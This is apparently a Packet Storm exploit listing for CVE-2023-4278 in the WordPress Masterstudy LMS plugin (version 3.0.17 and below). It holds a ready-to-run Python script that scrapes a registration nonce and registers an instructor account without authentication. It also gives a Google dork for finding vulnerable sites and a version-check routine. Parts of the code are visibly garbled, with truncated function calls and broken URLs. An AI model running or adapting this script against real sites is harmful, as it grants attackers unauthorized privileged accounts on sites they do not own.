

WordPress Masterstudy LMS 3.0.17 Account Creation

WordPress Masterstudy LMS plugin version 3.0.17 suffers from an unauthenticated instructor account creation vulnerability.

Packet Storm
# Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation# Google Dork: inurl:/user-public-account# Date: 2023-09-04# Exploit Author: Revan Arifio# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/# Version: <= 3.0.17# Tested on: Windows, Linux# CVE : CVE-2023-4278import requestsimport osimport reimport timebanner = """   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___    / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \      | || |__ \____  / _ \  | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) | | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ <  | |____   \  /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/                                                                             ======================================================================================================|| Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       |||| Author           :                                                   |||| Vendor Homepage  : https:/      |||| Support          :                                         ||======================================================================================================"""print(banner)# get noncedef get_nonce(target):    open_target = requests.get("{}/user-public-account".format(target))    search_nonce ='"stm_lms_register":"(.*?)"', open_target.text)    if search_nonce[1] != None:        return search_nonce[1]    else:        print("Failed when getting Nonce :p")# privielege escalationdef privesc(target, nonce, username, password, email):    req_data = {        "user_login":"{}".format(username),        "user_email":"{}".format(email),        "user_password":"{}".format(password),        "user_password_re":"{}".format(password),        "become_instructor":True,        "privacy_policy":True,        "degree":"",        "expertize":"",        "auditory":"",        "additional":[],        "additional_instructors":[],        "profile_default_fields_for_register":[],        "redirect_page":"{}/user-account/".format(target)        }    start ="{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)    if start.status_code == 200:        print("[+] Exploit Success !!")    else:        print("[+] Exploit Failed :p")# URL targettarget = input("[+] URL Target: ")print("[+] Starting Exploit")plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))plugin_version ="Stable tag: (.+)", plugin_check.text)int_version = plugin_version[1].replace(".", "")time.sleep(1)if int(int_version) < 3018:    print("[+] Target is Vulnerable !!")    # Credential    email =  input("[+] Email: ")    username =  input("[+] Username: ")    password =  input("[+] Password: ")    time.sleep(1)    print("[+] Getting Nonce...")    get_nonce = get_nonce(target)    # Get Nonce    if get_nonce != None:        print("[+] Success Getting Nonce: {}".format(get_nonce))        time.sleep(1)        # Start PrivEsc        privesc(target, get_nonce, username, password, email)    # ----------------------------------    else:    print("[+] Target is NOT Vulnerable :p")

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The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts.

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